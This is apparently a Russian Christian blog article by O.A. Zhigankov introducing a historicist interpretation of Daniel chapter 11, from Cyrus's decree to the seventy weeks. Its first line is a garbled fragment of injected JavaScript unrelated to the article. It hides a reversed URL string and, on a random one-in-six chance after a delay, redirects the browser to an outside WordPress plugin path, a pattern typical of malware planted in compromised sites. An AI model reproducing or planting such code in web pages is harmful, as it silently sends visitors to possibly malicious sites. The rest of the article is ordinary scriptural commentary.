toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor has-alpha-channel-opacity»/>
Даниилу, в ответ на его заступническую молитву за свой народ (см. Дан.9) ангелом Гавриилом (см. Дан.9:10) была представлена целая панорама событий, относящаяся ко многим дням, которым еще предстоит наступить. Следует иметь в виду, что весть, данная Даниилу, носила не просто информативный характер. Пророчество о семидесяти седьминах было дано Даниилу в ответ на его молитвы, и оно говорит о точном времени земного служения Мессии и открывает перед нами тайну, в которую “желают проникнуть и Ангелы” (см. 1Петр.1:10-12), что “предан будет смерти Христос” (см. Дан.9:26). В Дан.10 главе мы читаем о видении прославленного мужа, который сообщает Даниилу (см. Дан.11) дополнительные сведения об истории народа Божьего. Это пророчество точно описывает историю, простирающуюся от расцвета персидской Империи (времени Даниила) и до “конца времени” (см. Дан.11:40).
В 10-й главе книги Даниила нам сообщается, что видение Даниилу было дано в третий год Кира, царя Персидского. Кир II, Персидский царь (559 г. до н.э. – 530 г. до н.э.) больше известный как Кир Великий, основал Империю Ахеменидов. Основанная им империя, покорила сначала империю Мидян, затем Лидийскую империю и, в конечном итоге, Ново-Вавилонскую империю. Империя Кира была величайшей империей, которую миру когда-либо приходилось видеть. Он предоставил право еврейскому народу возвратиться в свою землю, подписав об этом соответствующий указ (декрет). Этот указ был первый из серии указов о восстановлении еврейского народа*. (*Данный указ Кира упоминается в Езд.1:2-4 как тот, который позволил восстанавливать храм. Однако, восстановление самого города (Иерусалима) в указе не упомянуто. Таким образом, этот указ не рассматривается в качестве отправной точки для рассчета пророчества о семидесяти седьминах (Дан.9:25).)
Из имеющейся информации следует, что пророческое видение Даниила 11 главы было дано ему в третий год Кира, в 3-й день первого месяца (Нисана) по еврейскому календарю. Ангел Гавриил (по видимости это был он) был ниспослан объяснить видение Даниилу; он предстал перед Даниилом спустя 21 день (после трехнедельного поста и молитвы Даниила), 24-го Нисана (см. Дан.10:4). Он объяснил, что был послан, чтобы помочь Даниилу уразуметь видение, которое ему было показано раньше, и которое касалось судьбы его народа в последние дни (см. Дан.10:14). Истолкование пророчества начинается с 11-й главы книги Даниила.
Основные предпосылки толкования 11-й главы книги пророка Даниила
Прежде чем я начну кратко комментировать каждый стих 11 главы, хотелось бы сказать несколько слов о необходимости естественного по смыслу деления этой главы на блоки. Богословам удалось достичь незначительного соглашение относительно того, где именно проводить эту разделительную черту, если вообще прибегать к ней. Их предположения играют важную роль в выборе этих мест. Я не намереваюсь затруднять читателя информацией или напоминанием о различных предположениях и точках зрения на данную главу. Вместо этого представлю здесь мои личные предположения и взгляды относительно изучаемой главы. Если наши с вами предположения совпадут, то, скорее всего, мы достигнем определенного соглашения*.(*Некоторые из источников, которые я использовал методологически вникая в эту главу: Кари Бройлес (Carigо C. Broyles), «Истолкование Ветхого Завета: принципы и шаги», при истолковании Ветхого Завета: «Руководство по экзегетике», изд. Carigo C. Broyles (Grand Rapids, MI: Baker, 2001); Герхард Хазел (Gerhard F. Hasel), Истолкование Библии сегодня: анализ современных методов библейского толкования и предложения по истолкованию Библии как Слова Божьего (Lincoln, NE: College View Printers, 1985); Джон Хейс (John H. Hayes) и Карл Р. Холидей (Carl R. Holladay), Библейская экзегеза: Пособие для начинающих (London: SCM, 1983); Вальтер Кайзер-младший (Walter C. Kaiser Jr), Обращаясь к богословской и экзегетической теологии: библейская экзегеза для проповедующих и учителей (Grand Rapids, MI: Baker, 1981); Экхард Мюллер (Ekkehardt Muller), «Руководство по истолкованию Писаний», в Понимании Писания: адвентистский подход», Джордж Рейд (George W. Reid) (Silver Spring, MD: Biblical Research Institute, 2006).
Излишне упоминать о том, что я воспринимаю Даниила 11 главу не как постдиктум, а как пророчество* (*ЛаРондел (LaRondelle), Ханс К. (Hans K.) “Сердце историцизма” (accessed July 30, 2013). Также я считаю, что пророческое повествование 11 главы, включая первые три стиха следующей, 12 главы, простирается до конца дней, до самого Второго Пришествия Иисуса Христа.
Если эти взгляды близки вам, позвольте мне перейти к третьему предположению: методу историцизма. Говоря другими словами, в исторической части повествования Дан.11 нет существенных пробелов. Исторический подход придерживается того, что основные тенденции, отражающие историю избранного Богом народа, — как государства Израиль, так и Его Церкви, — должны быть обнаружены в пророческом повествовании.
Автор не стоит на позиции ни претеристов, ни футуристов. Претеризму свойственно толковать пророчества как события, которые уже имели место. Пророчества Даниила трактуются сторонниками данного ответвления как события, которые произошли во втором веке до нашей эры. Футуризм, напротив, склонен видеть все пророческие события, как те, которые происходят в будущем, как можно ближе ко времени Второго Пришествия Христа. Таким образом, сотни и тысячи лет истории не отражены, согласно их верованиям, в библейских пророчествах. Однако, я считаю, что 11 глава делает именно то, что она и обещает: предоставляет информацию о важнейших исторических событиях, касающихся Божьего избранного народа со времен Даниила и “даже до конца времени” (см.Дан.12:4), не делая при этом значительных перерывов.
Я также считаю, что особое внимание в повествовании Даниила с появлением христианской церкви неизбежно расширяется от местного, национального вопроса к международным делам. Так или иначе многие, если не все исследователи Библии согласны с тем, что в определенный момент в 11 главе делается этот переход. Вопрос лишь заключается в том, где именно?
Для определения стиха, в котором осуществляется переход к эпохе Нового Завета, выбирается тот или иной способ истолкования. Мне также необходимо сделать этот важный и неизбежный шаг. Какими же критериями пользуюсь я? Во-первых, я считаю, что упоминания Мессии и Его смерти должны быть в обязательном порядке включены в повествование, которое касается истории будь то евреев, или Церкви. Также я полагаю, что переход от буквального (ВЗ, национального) истолкования к типологическому (НЗ, международному) должен быть произведен в момент установления Нового Завета между Богом и людьми – то есть с распятием Иисуса Христа. Единственный текст, который упоминает как Мессию (вождя), так и Завет, и в то же время хронологически стоит в конце ветхозаветной эпохи, — это Дан.11:22.* (*Уильям Ши (William H. Shea), Книга Даниила: путеводитель для читателей, Pacific Press Publishing Association, 2005.)
Разумеется, мой выбор центрального стиха влияет на мое понимание Дан.11. Если мои методы размышления кажутся вам приемлемыми, приглашаю вас познакомится с коротким историческим комментарием, который я привожу ниже, сопровождая им каждый стих 11 главы.
Существенным считаю упомянуть, что 11 глава Даниила является как бы венцом всех пророчеств Даниила. А потому чтобы ее правильно понять необходимо начать, наверное, с первого пророчества, которое было истолковано Даниилом для царя Навуходоносора – это Даниила 2 глава. Это пророчество об истукане было дано как каркас, который установил границы и вехи. Последующие пророчества – когда мы читаем о рогах, о зверях — они дополняют, рисуют картины внутри этого каркаса, наслаивают информацию. Все эти пророчества связаны между собою, все они говорят об одном. И 11-ая глава Даниила уникальна в этой череде пророчеств, потому что она дает нам необычайно подробную, яркую информацию с подробными историческими деталями. Это Божий шедевр и если мы его понимаем, то становится даже трудно от него оторваться. В этом пророчестве мы видим повторение истукана, битвы зверей, — повторение предыдущих пророчеств, которые были даны Даниилу от стопы до головы истукана. Это пророчество охватывает весь этот период истории и делает это по той же структуре, какую вырисовывает уже истукан. И когда мы понимаем, что это единое событие, одно пророчество, то читать 11 главу книги Даниила становится удовольствием, особенно когда немного знаешь историю. Конечно, для человека, который не знает историю, интерес может представлять только заключительная часть этой главы, так как описанные там события происходят на наших глазах. Потому, в значительной степени, наша готовность к встрече с 11 главой Даниила зависит от нашей информированности по вопросам истории.
К сожалению, в наше время мало кто серьезно занимается историей и потому хотелось бы в нашем исследовании обозначить главные исторические события так, чтобы эта глава ожила в нашем воображении, чтобы мы могли увидеть ее в действии в истории.
Как уже говорилось выше, Даниила 11 глава начинает описывать события с того времени, в которое жил Даниил. Это времена Персидских царей или царей с Востока, которые в ту пору пришли на смену Вавилону. Эти цари — Божьи помазанники. О царе Кире задолго до его появления в истории ещё пророк Исаия писал, как о помазаннике Божьем (см. Ис.45).
В первый год своего правления царь Кир издает указ об освобождении народа Божьего. Согласно этого указа евреям было позволено возвращаться в свою землю в Иерусалим, восстанавливать свой храм. Эти действия были от Бога, потому что в это время исполнились 70 лет со времени пленения. И Даниил это время вычислил, как он говорит “по книгам” (Дан.9:1,2), из книг пророка Иеремии. И когда он это вычислил, когда он понял, что дожил до этого времени, и когда начал молиться в соответствии с Божьим обетованием, тогда ему явился Архангел Гавриил с объяснением чего же стоит ожидать теперь. Даниил приложил все свое сердце, чтобы изучить и исследовать то, что возможно знать из Писания, и тогда ему Господь открыл последующие события.
Автор: Жиганков О.А.
Поделитесь своими мыслями ниже, в комментариях.
Оставить комментарий очень просто. Напишите ваше имя и эл. почту (для получения уведомлений о возможных вам ответах) и делитесь вашими мыслями в комментариях. Регистрация единоразовая.
Мы в соцсетях
Солёное радио — Telegram, YouTube, ВКонтакте, Яндекс Дзен
Открытая семинария — Telegram, YouTube, ВКонтакте, Яндекс Дзен
«Новости христианства» — Telegtam, ВКонтакте
No Comments